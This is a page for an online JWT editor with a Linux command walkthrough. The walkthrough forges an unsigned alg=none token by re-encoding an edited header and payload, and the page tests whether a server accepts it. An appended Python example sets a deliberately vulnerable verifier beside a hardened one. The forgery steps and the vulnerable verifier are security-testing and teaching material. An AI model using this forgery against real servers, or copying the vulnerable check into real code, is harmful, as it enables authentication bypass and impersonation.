Edit JWT Online (setting algorithm to none)

Online editor for a JWT token to use the "none" algorithm. Edit the header and the payload, get the encoded output.

One test of whether a JSON Web Token (JWT) is handled securely is to alter the algorithm named in its header. The signature is what lets the server confirm the token hasn't been modified by an attacker. If the header claims the algorithm is "none" and the server honours that claim, the signature check may be skipped entirely. This means we can edit the content of the JWT and have it accepted, bypassing this important security feature.

Paste an encoded JWT below to edit it. The altered version appears in the last text box.
How to do this on Linux (if you don't have access to this page):

Start with the encoded token:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

Split the encoded token into segments delimited by the "." character.

The first block is the header, decode that:

echo 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9' | base64 -d

Here, the result is:

{"alg":"HS256","typ":"JWT"}

You can edit this by hand and alter the algorithm; here we're changing it to "none". Once changed, base64 encode it again so it's usable in the token:

echo -n '{"alg":"none","typ":"JWT"}' | base64

The result of that is:

eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=

IMPORTANT: Remove the trailing "=" before we use it to replace the first part of the JWT. JWT segments use base64url encoding, which drops the "=" padding and also writes "-" instead of "+" and "_" instead of "/"; this particular header produces neither of those characters, but check for them in your own output.

Follow the same process to edit the JWT payload (second encoded block). Because the segment is stored without padding, add the missing "=" characters back (so the length is a multiple of 4) before decoding, otherwise base64 -d reports invalid input:

echo 'eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ==' | base64 -d

Result:

{"sub":"1234567890","name":"John Doe","iat":1516239022}

We'll edit the name from John Doe to be Jane Doe and encode it:

echo -n '{"sub":"1234567890","name":"Jane Doe","iat":1516239022}' | base64

Result:

eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkphbmUgRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ==

If we're setting the algorithm to "none" then we don't want a signature. The format we'll get is:

{encoded header}.{encoded payload}.

Note the "." on the end. The signature would normally follow it, but because the header now says the algorithm is none, no signature is supplied.

Our example becomes:

eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkphbmUgRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.

We've successfully edited a JWT and can test to see if the server accepts the edited version.
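The following Python is an added example and is not part of the original post or of any tool it describes. It shows the server side of the test explained at the top of the page and carried out in the steps above: a verifier that lets the token's own header choose the algorithm (which accepts the alg=none token built above) beside a hardened one that pins the algorithm server-side, requires a signature, and rejects it. The base64url helpers also handle the padding point from the steps above. The secret, the signed token made from it, and the function names are constructed for this example (the secret behind the page's original token is not on the page); the forged token is the one produced above.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# The alg=none token produced by the procedure above (header, payload, empty signature).
FORGED_NONE_TOKEN = (
    "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0."
    "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkphbmUgRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ."
)

# Constructed secret for this example only; the page does not give the original token's secret.
DEMO_SECRET = b"constructed-demo-secret-not-for-real-use"


def b64url_decode(segment: str) -> bytes:
    """Decode a JWT segment: base64url alphabet, with the stripped '=' padding restored."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(data: bytes) -> str:
    """Encode the way JWT segments are written: base64url alphabet, no '=' padding."""
    return base64.urlsafe_b64encode(data).decode("ascii").rstrip("=")


def hs256_mac(signing_input: str, secret: bytes) -> bytes:
    """HMAC-SHA256 over '<header>.<payload>', which is what an HS256 signature is."""
    return hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()


def make_hs256_token(payload: dict, secret: bytes) -> str:
    """Issue a properly signed HS256 token (compact JSON, like the page's examples)."""
    header_json = json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":"))
    header_seg = b64url_encode(header_json.encode())
    payload_seg = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{header_seg}.{payload_seg}"
    return f"{signing_input}.{b64url_encode(hs256_mac(signing_input, secret))}"


def verify_vulnerable(token: str, secret: bytes) -> Optional[dict]:
    """Lets the token's own header choose the algorithm; alg=none skips the check entirely."""
    header_seg, payload_seg, sig_seg = token.split(".")
    header = json.loads(b64url_decode(header_seg))
    if header.get("alg") == "none":
        # "No signature needed", according to the attacker-controlled header: this is the bug.
        return json.loads(b64url_decode(payload_seg))
    if header.get("alg") == "HS256":
        expected = hs256_mac(f"{header_seg}.{payload_seg}", secret)
        if hmac.compare_digest(expected, b64url_decode(sig_seg)):
            return json.loads(b64url_decode(payload_seg))
    return None


def verify_hardened(token: str, secret: bytes, expected_alg: str = "HS256") -> Optional[dict]:
    """Pins the algorithm server-side: the header must match it and a signature must be present."""
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:
        return None  # malformed, or the empty signature that an alg=none token carries
    header_seg, payload_seg, sig_seg = parts
    try:
        header = json.loads(b64url_decode(header_seg))
        signature = b64url_decode(sig_seg)
    except ValueError:  # bad base64 (binascii.Error) and bad JSON both derive from ValueError
        return None
    if header.get("alg") != expected_alg:
        return None  # alg=none and algorithm swapping are both rejected here
    if not hmac.compare_digest(hs256_mac(f"{header_seg}.{payload_seg}", secret), signature):
        return None
    return json.loads(b64url_decode(payload_seg))


if __name__ == "__main__":
    print("vulnerable accepts forged token:", verify_vulnerable(FORGED_NONE_TOKEN, DEMO_SECRET))
    print("hardened accepts forged token:  ", verify_hardened(FORGED_NONE_TOKEN, DEMO_SECRET))
    genuine = make_hs256_token({"sub": "1234567890", "name": "John Doe", "iat": 1516239022}, DEMO_SECRET)
    print("hardened accepts genuine token: ", verify_hardened(genuine, DEMO_SECRET))
```

The fix is the one line comparing the header's alg to a value the server chose: the token header is attacker-controlled input, so it can be required to match the configured algorithm, but it must never be allowed to select one. The same applies to real JWT libraries, which generally take an allowlist of algorithms for this reason.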
